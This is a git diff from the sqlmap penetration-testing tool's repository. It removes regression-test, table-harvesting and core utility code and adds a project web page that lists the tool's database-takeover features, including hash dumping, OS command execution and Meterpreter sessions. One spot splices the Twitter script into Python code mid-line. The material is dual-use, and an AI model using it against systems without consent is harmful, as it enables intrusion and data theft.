"%s\n\n" % log - elif not detected: - content += " - SQL injection not detected\n\n" - else: - content += "\n\n" - - if traceback: - content += "### Traceback:\n\n" - content += "%s\n\n" % str(traceback) - - content += "#######################################################################\n\n" - - end_string = "Regression test finished at %s" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()) - - if content: - content += end_string - SUBJECT = "Failed %s (%s)" % (SUBJECT, ", ".join("#%d" % count for count in test_counts)) - - msg = prepare_email(content) - - for test_count, attachment in attachments.items(): - attachment 
= MIMEText(attachment) - attachment.add_header("Content-Disposition", "attachment", filename="test_case_%d_console_output.txt" % test_count) - msg.attach(attachment) - - send_email(msg) - else: - SUBJECT = "Successful %s" % SUBJECT - msg = prepare_email("All test cases were successful\n\n%s" % end_string) - send_email(msg) - -if __name__ == "__main__": - log_fd = open("/tmp/sqlmapregressiontest.log", "wb") - log_fd.write("Regression test started at %s\n" % START_TIME) - - try: - main() - except Exception, e: - log_fd.write("An exception has occurred:\n%s" % str(traceback.format_exc())) - - log_fd.write("Regression test finished at %s\n\n" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime())) - log_fd.close() diff --git a/extra/sqlharvest/__init__.py b/extra/sqlharvest/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/extra/sqlharvest/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/sqlharvest/sqlharvest.py b/extra/sqlharvest/sqlharvest.py deleted file mode 100644 index 9391af1a..00000000 --- a/extra/sqlharvest/sqlharvest.py +++ /dev/null @@ -1,141 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import cookielib -import re -import socket -import sys -import urllib -import urllib2 -import ConfigParser - -from operator import itemgetter - -TIMEOUT = 10 -CONFIG_FILE = 'sqlharvest.cfg' -TABLES_FILE = 'tables.txt' -USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AskTB5.3)' -SEARCH_URL = 'http://www.google.com/m?source=mobileproducts&dc=gorganic' -MAX_FILE_SIZE = 2 * 1024 * 1024 # if a result (.sql) file for downloading is more than 2MB in size just skip it -QUERY = 'CREATE TABLE ext:sql' -REGEX_URLS = r';u=([^"]+?)&q=' -REGEX_RESULT = r'(?i)CREATE 
TABLE\s*(/\*.*\*/)?\s*(IF NOT EXISTS)?\s*(?P[^\(;]+)' - -def main(): - tables = dict() - cookies = cookielib.CookieJar() - cookie_processor = urllib2.HTTPCookieProcessor(cookies) - opener = urllib2.build_opener(cookie_processor) - opener.addheaders = [("User-Agent", USER_AGENT)] - - conn = opener.open(SEARCH_URL) - page = conn.read() # set initial cookie values - - config = ConfigParser.ConfigParser() - config.read(CONFIG_FILE) - - if not config.has_section("options"): - config.add_section("options") - if not config.has_option("options", "index"): - config.set("options", "index", "0") - - i = int(config.get("options", "index")) - - try: - with open(TABLES_FILE, 'r') as f: - for line in f.xreadlines(): - if len(line) > 0 and ',' in line: - temp = line.split(',') - tables[temp[0]] = int(temp[1]) - except: - pass - - socket.setdefaulttimeout(TIMEOUT) - - files, old_files = None, None - try: - while True: - abort = False - old_files = files - files = [] - - try: - conn = opener.open("%s&q=%s&start=%d&sa=N" % (SEARCH_URL, QUERY.replace(' ', '+'), i * 10)) - page = conn.read() - for match in re.finditer(REGEX_URLS, page): - files.append(urllib.unquote(match.group(1))) - if len(files) >= 10: - break - abort = (files == old_files) - - except KeyboardInterrupt: - raise - - except Exception, msg: - print msg - - if abort: - break - - sys.stdout.write("\n---------------\n") - sys.stdout.write("Result page #%d\n" % (i + 1)) - sys.stdout.write("---------------\n") - - for sqlfile in files: - print sqlfile - - try: - req = urllib2.Request(sqlfile) - response = urllib2.urlopen(req) - - if "Content-Length" in response.headers: - if int(response.headers.get("Content-Length")) > MAX_FILE_SIZE: - continue - - page = response.read() - found = False - counter = 0 - - for match in re.finditer(REGEX_RESULT, page): - counter += 1 - table = match.group("result").strip().strip("`\"'").replace('"."', ".").replace("].[", ".").strip('[]') - - if table and not any(_ in table for _ in ('>', '<', 
'--', ' ')): - found = True - sys.stdout.write('*') - - if table in tables: - tables[table] += 1 - else: - tables[table] = 1 - if found: - sys.stdout.write("\n") - - except KeyboardInterrupt: - raise - - except Exception, msg: - print msg - - else: - i += 1 - - except KeyboardInterrupt: - pass - - finally: - with open(TABLES_FILE, 'w+') as f: - tables = sorted(tables.items(), key=itemgetter(1), reverse=True) - for table, count in tables: - f.write("%s,%d\n" % (table, count)) - - config.set("options", "index", str(i + 1)) - with open(CONFIG_FILE, 'w+') as f: - config.write(f) - -if __name__ == "__main__": - main() diff --git a/favicon.ico b/favicon.ico new file mode 100644 index 00000000..75e92316 Binary files /dev/null and b/favicon.ico differ diff --git a/images/body-bg.jpg b/images/body-bg.jpg new file mode 100644 index 00000000..0e0f861b Binary files /dev/null and b/images/body-bg.jpg differ diff --git a/images/download-button-green.png b/images/download-button-green.png new file mode 100644 index 00000000..7e0625dc Binary files /dev/null and b/images/download-button-green.png differ diff --git a/images/download-button.png b/images/download-button.png new file mode 100644 index 00000000..df3f09a6 Binary files /dev/null and b/images/download-button.png differ diff --git a/images/github-button.png b/images/github-button.png new file mode 100644 index 00000000..efe07f9a Binary files /dev/null and b/images/github-button.png differ diff --git a/images/header-bg.jpg b/images/header-bg.jpg new file mode 100644 index 00000000..960bff75 Binary files /dev/null and b/images/header-bg.jpg differ diff --git a/images/highlight-bg.jpg b/images/highlight-bg.jpg new file mode 100644 index 00000000..4c4a78ef Binary files /dev/null and b/images/highlight-bg.jpg differ diff --git a/images/screenshot.png b/images/screenshot.png new file mode 100644 index 00000000..ecca7f9c Binary files /dev/null and b/images/screenshot.png differ diff --git a/images/sidebar-bg.jpg 
b/images/sidebar-bg.jpg new file mode 100644 index 00000000..42890fe7 Binary files /dev/null and b/images/sidebar-bg.jpg differ diff --git a/images/twitter.jpg b/images/twitter.jpg new file mode 100644 index 00000000..2a143fe6 Binary files /dev/null and b/images/twitter.jpg differ diff --git a/index.html b/index.html new file mode 100644 index 00000000..de78236b --- /dev/null +++ b/index.html @@ -0,0 +1,167 @@ + + + + + + + + + + + + + + + + + +sqlmap: automatic SQL injection and database takeover tool + + + +
+ +
+ +
+
+
+ + + +

Introduction

+ +

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

+ +
+ +

Features

+ +
    +
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB database management systems.
  • +
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • +
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • +
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • +
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • +
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • +
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • +
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • +
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • +
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • +
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.
  • +
+ +

Refer to the wiki for an exhaustive breakdown of the features.

+ +

Download

+ +

You can download the latest zipball or tarball.

+

Preferably, you can download sqlmap by cloning the Git repository:

+
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+ +

Documentation

+ + + +

Demo

+ +

+

Watch more demos here.

+ +

Communication

+ +

The sqlmap-users@lists.sourceforge.net mailing list is the preferred way to ask questions and discuss with other users, contributors and the developers.
+To subscribe use the online web form. It is also available via Gmane RSS feed. The archives are available online on Gmane.

+ +

Bug reports are welcome! Please report all bugs on the issue tracker or (alternatively) to the mailing list.

+ +

Contribute

+ +

All code contributions are greatly appreciated. First off, clone the Git repository, read the user's manual carefully, go through the code yourself and drop us an email if you are having a hard time grasping its structure and meaning.

+

Our preferred method of patch submission is via a Git pull request.

+

Each patch should make one logical change. Please follow the existing stylistic conventions: wrap code to 76 columns when possible. Avoid tabs, use four space characters instead. Before you put time into a non-trivial patch, it is worth discussing it on the mailing list or privately by email.

+

Many people have contributed in different ways to the sqlmap development. You can be the next!

+ +

Donate

+ +

sqlmap is the result of numerous hours of passionated work from a small team of computer security enthusiasts. If you appreciated our work and you want to see sqlmap kept being developed, please consider making a donation to our efforts via PayPal to donations@sqlmap.org. We also accept Ƀitcoins to 1AUrrKYsamBEThdruYTQmUfMfLF7aaxU6x.

+ +

License

+ +

Copyright © 2006-2016 by Bernardo Damele Assumpcao Guimaraes and Miroslav Stampar. All rights reserved.

+ +

This program is free software; you may redistribute and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; Version 2 (or later) with the clarifications and exceptions described in the license file. This guarantees your right to use, modify, and redistribute this software under certain conditions. If you wish to embed sqlmap technology into proprietary software, we sell alternative licenses +(contact sales@sqlmap.org).

+ +

Disclaimer

+ +

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License v2.0 for more details at http://www.gnu.org/licenses/gpl-2.0.html.

+ +

Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

+ +

Developers

+ + + +

You can contact the development team by writing to dev@sqlmap.org.

+
+ + +
+
+ + + + + + diff --git a/javascripts/main.js b/javascripts/main.js new file mode 100644 index 00000000..d8135d37 --- /dev/null +++ b/javascripts/main.js @@ -0,0 +1 @@ +console.log('This would be the main JS file.'); diff --git a/javascripts/twitter.min.js b/javascripts/twitter.min.js new file mode 100644 index 00000000..37727348 --- /dev/null +++ b/javascripts/twitter.min.js @@ -0,0 +1,19 @@ +/*** + * Twitter JS v1.13.3 + * http://code.google.com/p/twitterjs/ + * Copyright (c) 2009 Remy Sharp / MIT License + * $Date$ + */ + /* + MIT (MIT-LICENSE.txt) + */ + typeof renderTwitters!="function"&&function(){function v(a){var c;for(c in a.user)a["user_"+c]=a.user[c];a.time=s(a.created_at);return a}function w(a){t?a.call():u.push(a)}function q(){t=true;for(var a;a=u.shift();)a.call()}function x(){if(document.addEventListener&&!r.webkit)document.addEventListener("DOMContentLoaded",q,false);else if(r.msie){document.write("||%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), " ", page) - while retVal.find(" ") != -1: - retVal = retVal.replace(" ", " ") - retVal = htmlunescape(retVal.strip()) - - return retVal - -def getPageWordSet(page): - """ - Returns word set used in page content - - >>> sorted(getPageWordSet(u'foobartest')) - [u'foobar', u'test'] - """ - - retVal = set() - - # only if the page's charset has been successfully identified - if isinstance(page, unicode): - _ = getFilteredPageContent(page) - retVal = set(re.findall(r"\w+", _)) - - return retVal - -def showStaticWords(firstPage, secondPage): - """ - Prints words appearing in two different response pages - """ - - infoMsg = "finding static words in longest matching part of dynamic page content" - logger.info(infoMsg) - - firstPage = getFilteredPageContent(firstPage) - secondPage = getFilteredPageContent(secondPage) - - infoMsg = "static words: " - - if firstPage and secondPage: - match = SequenceMatcher(None, firstPage, secondPage).find_longest_match(0, len(firstPage), 0, len(secondPage)) - commonText = 
firstPage[match[0]:match[0] + match[2]] - commonWords = getPageWordSet(commonText) - else: - commonWords = None - - if commonWords: - commonWords = list(commonWords) - commonWords.sort(lambda a, b: cmp(a.lower(), b.lower())) - - for word in commonWords: - if len(word) > 2: - infoMsg += "'%s', " % word - - infoMsg = infoMsg.rstrip(", ") - else: - infoMsg += "None" - - logger.info(infoMsg) - -def isWindowsDriveLetterPath(filepath): - """ - Returns True if given filepath starts with a Windows drive letter - - >>> isWindowsDriveLetterPath('C:\\boot.ini') - True - >>> isWindowsDriveLetterPath('/var/log/apache.log') - False - """ - - return re.search("\A[\w]\:", filepath) is not None - -def posixToNtSlashes(filepath): - """ - Replaces all occurances of Posix slashes (/) in provided - filepath with NT ones (\) - - >>> posixToNtSlashes('C:/Windows') - 'C:\\\\Windows' - """ - - return filepath.replace('/', '\\') if filepath else filepath - -def ntToPosixSlashes(filepath): - """ - Replaces all occurances of NT slashes (\) in provided - filepath with Posix ones (/) - - >>> ntToPosixSlashes('C:\\Windows') - 'C:/Windows' - """ - - return filepath.replace('\\', '/') if filepath else filepath - -def isHexEncodedString(subject): - """ - Checks if the provided string is hex encoded - - >>> isHexEncodedString('DEADBEEF') - True - >>> isHexEncodedString('test') - False - """ - - return re.match(r"\A[0-9a-fA-Fx]+\Z", subject) is not None - -@cachedmethod -def getConsoleWidth(default=80): - """ - Returns console width - """ - - width = None - - if os.getenv("COLUMNS", "").isdigit(): - width = int(os.getenv("COLUMNS")) - else: - try: - try: - FNULL = open(os.devnull, 'w') - except IOError: - FNULL = None - process = execute("stty size", shell=True, stdout=PIPE, stderr=FNULL or PIPE) - stdout, _ = process.communicate() - items = stdout.split() - - if len(items) == 2 and items[1].isdigit(): - width = int(items[1]) - except (OSError, MemoryError): - pass - - if width is None: - try: - 
import curses - - stdscr = curses.initscr() - _, width = stdscr.getmaxyx() - curses.endwin() - except: - pass - - return width or default - -def clearConsoleLine(forceOutput=False): - """ - Clears current console line - """ - - if getattr(LOGGER_HANDLER, "is_tty", False): - dataToStdout("\r%s\r" % (" " * (getConsoleWidth() - 1)), forceOutput) - - kb.prependFlag = False - kb.stickyLevel = None - -def parseXmlFile(xmlFile, handler): - """ - Parses XML file by a given handler - """ - - try: - with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream: - parse(stream, handler) - except (SAXParseException, UnicodeError), ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (xmlFile, getSafeExString(ex)) - errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg - -def getSQLSnippet(dbms, sfile, **variables): - """ - Returns content of SQL snippet located inside 'procs/' directory - """ - - if sfile.endswith('.sql') and os.path.exists(sfile): - filename = sfile - elif not sfile.endswith('.sql') and os.path.exists("%s.sql" % sfile): - filename = "%s.sql" % sfile - else: - filename = os.path.join(paths.SQLMAP_PROCS_PATH, DBMS_DIRECTORY_DICT[dbms], sfile if sfile.endswith('.sql') else "%s.sql" % sfile) - checkFile(filename) - - retVal = readCachedFileContent(filename) - retVal = re.sub(r"#.+", "", retVal) - retVal = re.sub(r"(?s);\s+", "; ", retVal).strip("\r\n") - - for _ in variables.keys(): - retVal = re.sub(r"%%%s%%" % _, variables[_], retVal) - - for _ in re.findall(r"%RANDSTR\d+%", retVal, re.I): - retVal = retVal.replace(_, randomStr()) - - for _ in re.findall(r"%RANDINT\d+%", retVal, re.I): - retVal = retVal.replace(_, randomInt()) - - variables = re.findall(r"(? 1 else "", ", ".join(variables), sfile) - logger.error(errMsg) - - msg = "do you want to provide the substitution values? 
[y/N] " - choice = readInput(msg, default="N") - - if choice and choice[0].lower() == "y": - for var in variables: - msg = "insert value for variable '%s': " % var - val = readInput(msg, default="") - retVal = retVal.replace(r"%%%s%%" % var, val) - - return retVal - -def readCachedFileContent(filename, mode='rb'): - """ - Cached reading of file content (avoiding multiple same file reading) - """ - - if filename not in kb.cache.content: - with kb.locks.cache: - if filename not in kb.cache.content: - checkFile(filename) - try: - with openFile(filename, mode) as f: - kb.cache.content[filename] = f.read() - except (IOError, OSError, MemoryError), ex: - errMsg = "something went wrong while trying " - errMsg += "to read the content of file '%s' ('%s')" % (filename, getSafeExString(ex)) - raise SqlmapSystemException(errMsg) - - return kb.cache.content[filename] - -def readXmlFile(xmlFile): - """ - Reads XML file content and returns its DOM representation - """ - - checkFile(xmlFile) - retVal = minidom.parse(xmlFile).documentElement - - return retVal - -def stdev(values): - """ - Computes standard deviation of a list of numbers. - Reference: http://www.goldb.org/corestats.html - - >>> stdev([0.9, 0.9, 0.9, 1.0, 0.8, 0.9]) - 0.06324555320336757 - """ - - if not values or len(values) < 2: - return None - - key = (values[0], values[-1], len(values)) - - if kb.get("cache") and key in kb.cache.stdev: - retVal = kb.cache.stdev[key] - else: - avg = average(values) - _ = reduce(lambda x, y: x + pow((y or 0) - avg, 2), values, 0.0) - retVal = sqrt(_ / (len(values) - 1)) - if kb.get("cache"): - kb.cache.stdev[key] = retVal - - return retVal - -def average(values): - """ - Computes the arithmetic mean of a list of numbers. 
- - >>> average([0.9, 0.9, 0.9, 1.0, 0.8, 0.9]) - 0.9 - """ - - return (sum(values) / len(values)) if values else None - -def calculateDeltaSeconds(start): - """ - Returns elapsed time from start till now - """ - - return time.time() - start - -def initCommonOutputs(): - """ - Initializes dictionary containing common output values used by "good samaritan" feature - """ - - kb.commonOutputs = {} - key = None - - with openFile(paths.COMMON_OUTPUTS, 'r') as f: - for line in f.readlines(): # xreadlines doesn't return unicode strings when codec.open() is used - if line.find('#') != -1: - line = line[:line.find('#')] - - line = line.strip() - - if len(line) > 1: - if line.startswith('[') and line.endswith(']'): - key = line[1:-1] - elif key: - if key not in kb.commonOutputs: - kb.commonOutputs[key] = set() - - if line not in kb.commonOutputs[key]: - kb.commonOutputs[key].add(line) - -def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, unique=False): - """ - Returns newline delimited items contained inside file - """ - - retVal = list() if not unique else OrderedDict() - - checkFile(filename) - - try: - with openFile(filename, 'r', errors="ignore") if unicode_ else open(filename, 'r') as f: - for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used - if commentPrefix: - if line.find(commentPrefix) != -1: - line = line[:line.find(commentPrefix)] - - line = line.strip() - - if not unicode_: - try: - line = str.encode(line) - except UnicodeDecodeError: - continue - - if line: - if lowercase: - line = line.lower() - - if unique and line in retVal: - continue - - if unique: - retVal[line] = True - else: - retVal.append(line) - except (IOError, OSError, MemoryError), ex: - errMsg = "something went wrong while trying " - errMsg += "to read the content of file '%s' ('%s')" % (filename, getSafeExString(ex)) - raise SqlmapSystemException(errMsg) - - return retVal if not unique else 
retVal.keys() - -def goGoodSamaritan(prevValue, originalCharset): - """ - Function for retrieving parameters needed for common prediction (good - samaritan) feature. - - prevValue: retrieved query output so far (e.g. 'i'). - - Returns commonValue if there is a complete single match (in kb.partRun - of txt/common-outputs.txt under kb.partRun) regarding parameter - prevValue. If there is no single value match, but multiple, commonCharset is - returned containing more probable characters (retrieved from matched - values in txt/common-outputs.txt) together with the rest of charset as - otherCharset. - """ - - if kb.commonOutputs is None: - initCommonOutputs() - - predictionSet = set() - commonValue = None - commonPattern = None - countCommonValue = 0 - - # If the header (e.g. Databases) we are looking for has common - # outputs defined - if kb.partRun in kb.commonOutputs: - commonPartOutputs = kb.commonOutputs[kb.partRun] - commonPattern = commonFinderOnly(prevValue, commonPartOutputs) - - # If the longest common prefix is the same as previous value then - # do not consider it - if commonPattern and commonPattern == prevValue: - commonPattern = None - - # For each common output - for item in commonPartOutputs: - # Check if the common output (item) starts with prevValue - # where prevValue is the enumerated character(s) so far - if item.startswith(prevValue): - commonValue = item - countCommonValue += 1 - - if len(item) > len(prevValue): - char = item[len(prevValue)] - predictionSet.add(char) - - # Reset single value if there is more than one possible common - # output - if countCommonValue > 1: - commonValue = None - - commonCharset = [] - otherCharset = [] - - # Split the original charset into common chars (commonCharset) - # and other chars (otherCharset) - for ordChar in originalCharset: - if chr(ordChar) not in predictionSet: - otherCharset.append(ordChar) - else: - commonCharset.append(ordChar) - - commonCharset.sort() - - return commonValue, commonPattern, 
commonCharset, originalCharset - else: - return None, None, None, originalCharset - -def getPartRun(alias=True): - """ - Goes through call stack and finds constructs matching conf.dbmsHandler.*. - Returns it or its alias used in txt/common-outputs.txt - """ - - retVal = None - commonPartsDict = optDict["Enumeration"] - - try: - stack = [item[4][0] if isinstance(item[4], list) else '' for item in inspect.stack()] - - # Goes backwards through the stack to find the conf.dbmsHandler method - # calling this function - for i in xrange(0, len(stack) - 1): - for regex in (r"self\.(get[^(]+)\(\)", r"conf\.dbmsHandler\.([^(]+)\(\)"): - match = re.search(regex, stack[i]) - - if match: - # This is the calling conf.dbmsHandler or self method - # (e.g. 'getDbms') - retVal = match.groups()[0] - break - - if retVal is not None: - break - - # Reference: http://coding.derkeiler.com/Archive/Python/comp.lang.python/2004-06/2267.html - except TypeError: - pass - - # Return the INI tag to consider for common outputs (e.g. 
'Databases') - if alias: - return commonPartsDict[retVal][1] if isinstance(commonPartsDict.get(retVal), tuple) else retVal - else: - return retVal - -def getUnicode(value, encoding=None, noneToNull=False): - """ - Return the unicode representation of the supplied value: - - >>> getUnicode(u'test') - u'test' - >>> getUnicode('test') - u'test' - >>> getUnicode(1) - u'1' - """ - - if noneToNull and value is None: - return NULL - - if isListLike(value): - value = list(getUnicode(_, encoding, noneToNull) for _ in value) - return value - - if isinstance(value, unicode): - return value - elif isinstance(value, basestring): - while True: - try: - return unicode(value, encoding or (kb.get("pageEncoding") if kb.get("originalPage") else None) or UNICODE_ENCODING) - except UnicodeDecodeError, ex: - try: - return unicode(value, UNICODE_ENCODING) - except: - value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:] - else: - try: - return unicode(value) - except UnicodeDecodeError: - return unicode(str(value), errors="ignore") # encoding ignored for non-basestring instances - -def longestCommonPrefix(*sequences): - """ - Returns longest common prefix occuring in given sequences - Reference: http://boredzo.org/blog/archives/2007-01-06/longest-common-prefix-in-python-2 - - >>> longestCommonPrefix('foobar', 'fobar') - 'fo' - """ - - if len(sequences) == 1: - return sequences[0] - - sequences = [pair[1] for pair in sorted((len(fi), fi) for fi in sequences)] - - if not sequences: - return None - - for i, comparison_ch in enumerate(sequences[0]): - for fi in sequences[1:]: - ch = fi[i] - - if ch != comparison_ch: - return fi[:i] - - return sequences[0] - -def commonFinderOnly(initial, sequence): - return longestCommonPrefix(*filter(lambda x: x.startswith(initial), sequence)) - -def pushValue(value): - """ - Push value to the stack (thread dependent) - """ - - getCurrentThreadData().valueStack.append(copy.deepcopy(value)) 
- -def popValue(): - """ - Pop value from the stack (thread dependent) - - >>> pushValue('foobar') - >>> popValue() - 'foobar' - """ - - return getCurrentThreadData().valueStack.pop() - -def wasLastResponseDBMSError(): - """ - Returns True if the last web request resulted in a (recognized) DBMS error page - """ - - threadData = getCurrentThreadData() - return threadData.lastErrorPage and threadData.lastErrorPage[0] == threadData.lastRequestUID - -def wasLastResponseHTTPError(): - """ - Returns True if the last web request resulted in an errornous HTTP code (like 500) - """ - - threadData = getCurrentThreadData() - return threadData.lastHTTPError and threadData.lastHTTPError[0] == threadData.lastRequestUID - -def wasLastResponseDelayed(): - """ - Returns True if the last web request resulted in a time-delay - """ - - # 99.9999999997440% of all non time-based SQL injection affected - # response times should be inside +-7*stdev([normal response times]) - # Math reference: http://www.answers.com/topic/standard-deviation - - deviation = stdev(kb.responseTimes.get(kb.responseTimeMode, [])) - threadData = getCurrentThreadData() - - if deviation and not conf.direct: - if len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: - warnMsg = "time-based standard deviation method used on a model " - warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES - logger.warn(warnMsg) - - lowerStdLimit = average(kb.responseTimes[kb.responseTimeMode]) + TIME_STDEV_COEFF * deviation - retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit)) - - if not kb.testMode and retVal: - if kb.adjustTimeDelay is None: - msg = "do you want sqlmap to try to optimize value(s) " - msg += "for DBMS delay responses (option '--time-sec')? 
[Y/n] " - choice = readInput(msg, default='Y') - kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if choice.upper() == 'N' else ADJUST_TIME_DELAY.YES - if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: - adjustTimeDelay(threadData.lastQueryDuration, lowerStdLimit) - - return retVal - else: - return (threadData.lastQueryDuration - conf.timeSec) >= 0 - -def adjustTimeDelay(lastQueryDuration, lowerStdLimit): - """ - Provides tip for adjusting time delay in time-based data retrieval - """ - - candidate = 1 + int(round(lowerStdLimit)) - - if candidate: - kb.delayCandidates = [candidate] + kb.delayCandidates[:-1] - - if all((x == candidate for x in kb.delayCandidates)) and candidate < conf.timeSec: - conf.timeSec = candidate - - infoMsg = "adjusting time delay to " - infoMsg += "%d second%s due to good response times" % (conf.timeSec, 's' if conf.timeSec > 1 else '') - logger.info(infoMsg) - -def getLastRequestHTTPError(): - """ - Returns last HTTP error code - """ - - threadData = getCurrentThreadData() - return threadData.lastHTTPError[1] if threadData.lastHTTPError else None - -def extractErrorMessage(page): - """ - Returns reported error message from page if it founds one - - >>> extractErrorMessage(u'Test\\nWarning: oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated

Only a test page

') - u'oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated' - """ - - retVal = None - - if isinstance(page, basestring): - for regex in ERROR_PARSING_REGEXES: - match = re.search(regex, page, re.DOTALL | re.IGNORECASE) - - if match: - retVal = htmlunescape(match.group("result")).replace("
", "\n").strip() - break - - return retVal - -def findMultipartPostBoundary(post): - """ - Finds value for a boundary parameter in given multipart POST body - """ - - retVal = None - - done = set() - candidates = [] - - for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""): - _ = match.group(1).strip().strip('-') - - if _ in done: - continue - else: - candidates.append((post.count(_), _)) - done.add(_) - - if candidates: - candidates.sort(key=lambda _: _[0], reverse=True) - retVal = candidates[0][1] - - return retVal - -def urldecode(value, encoding=None, unsafe="%%&=;+%s" % CUSTOM_INJECTION_MARK_CHAR, convall=False, plusspace=True): - """ - URL decodes given value - - >>> urldecode('AND%201%3E%282%2B3%29%23', convall=True) - u'AND 1>(2+3)#' - """ - - result = value - - if value: - try: - # for cases like T%C3%BCrk%C3%A7e - value = str(value) - except ValueError: - pass - finally: - if convall: - result = urllib.unquote_plus(value) if plusspace else urllib.unquote(value) - else: - def _(match): - charset = reduce(lambda x, y: x.replace(y, ""), unsafe, string.printable) - char = chr(ord(match.group(1).decode("hex"))) - return char if char in charset else match.group(0) - result = value - if plusspace: - result = result.replace("+", " ") # plus sign has a special meaning in URL encoded data (hence the usage of urllib.unquote_plus in convall case) - result = re.sub("%([0-9a-fA-F]{2})", _, result) - - if isinstance(result, str): - result = unicode(result, encoding or UNICODE_ENCODING, "replace") - - return result - -def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False): - """ - URL encodes given value - - >>> urlencode('AND 1>(2+3)#') - 'AND%201%3E%282%2B3%29%23' - """ - - if conf.get("direct"): - return value - - count = 0 - result = None if value is None else "" - - if value: - if Backend.isDbms(DBMS.MSSQL) and not kb.tamperFunctions and any(ord(_) > 255 for _ in value): - warnMsg = "if you experience problems with " - warnMsg += 
"non-ASCII identifier names " - warnMsg += "you are advised to rerun with '--tamper=charunicodeencode'" - singleTimeWarnMessage(warnMsg) - - if convall or safe is None: - safe = "" - - # corner case when character % really needs to be - # encoded (when not representing URL encoded char) - # except in cases when tampering scripts are used - if all(map(lambda x: '%' in x, [safe, value])) and not kb.tamperFunctions: - value = re.sub("%(?![0-9a-fA-F]{2})", "%25", value) - - while True: - result = urllib.quote(utf8encode(value), safe) - - if limit and len(result) > URLENCODE_CHAR_LIMIT: - if count >= len(URLENCODE_FAILSAFE_CHARS): - break - - while count < len(URLENCODE_FAILSAFE_CHARS): - safe += URLENCODE_FAILSAFE_CHARS[count] - count += 1 - if safe[-1] in value: - break - else: - break - - if spaceplus: - result = result.replace(urllib.quote(' '), '+') - - return result - -def runningAsAdmin(): - """ - Returns True if the current process is run under admin privileges - """ - - isAdmin = None - - if PLATFORM in ("posix", "mac"): - _ = os.geteuid() - - isAdmin = isinstance(_, (int, float, long)) and _ == 0 - elif IS_WIN: - import ctypes - - _ = ctypes.windll.shell32.IsUserAnAdmin() - - isAdmin = isinstance(_, (int, float, long)) and _ == 1 - else: - errMsg = "sqlmap is not able to check if you are running it " - errMsg += "as an administrator account on this platform. 
